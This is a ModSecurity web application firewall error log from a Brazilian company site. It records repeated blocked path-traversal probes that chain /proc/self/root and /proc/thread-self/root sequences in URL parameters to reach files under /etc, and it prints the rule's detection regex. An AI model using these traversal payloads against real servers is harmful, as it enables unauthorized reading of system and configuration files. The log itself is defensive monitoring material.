[Thu Mar 19 04:50:23.407568 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:38898] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqv_u8EFLIOrSqIpttPQAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:50:24.795382 2026] [:error] [pid 27293:tid 140411699963648] [client 74.7.241.31:38902] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqwP-YZRR_7pZ7nDJczQAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:50:28.478129 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.241.31:38914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqxPu8EFLIOrSqIpttQwAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:50:31.067032 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:47160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqx-oXxyEfFpUF8f_gJAAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:50:32.387261 2026] [:error] [pid 27293:tid 140411683178240] [client 74.7.241.31:47168] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqyP-YZRR_7pZ7nDJc2gAAA8c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:50:33.240816 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.243.128:48728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqyf-YZRR_7pZ7nDJc3AAAA9Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:50:33.643160 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:47180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqyda6ubjKNq_cu4YRXAAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:50:35.031034 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.241.31:47184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqy_u8EFLIOrSqIpttRQAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:50:37.399126 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:48742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqzQkwaGbbGflqUZCEYgAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:50:40.468084 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:47188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqz-yqAr6etmhZHNozGwAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:50:41.881802 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.241.31:57170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuq0fu8EFLIOrSqIpttTwAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:50:43.899047 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:48744] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuq0_u8EFLIOrSqIpttXQAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:51:28.983182 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:37164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburAOyqAr6etmhZHNozaAAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:51:33.415053 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.243.128:51190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburBQbLMZ6AikZjR9UtCQAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:51:42.827216 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:51192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburDsdf6f5d65gmYZRDLAAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:51:44.136301 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:49352] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburEPu8EFLIOrSqIpttxQAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:51:44.911511 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.241.31:57184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburEPu8EFLIOrSqIpttxwAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:51:45.446649 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:49358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburEda6ubjKNq_cu4YRhwAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:51:46.789845 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:49364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburEta6ubjKNq_cu4YRjQAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:51:48.092226 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:49380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburFOoXxyEfFpUF8f_gRAAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:51:49.383377 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.243.128:49386] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburFf-YZRR_7pZ7nDJdCQAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
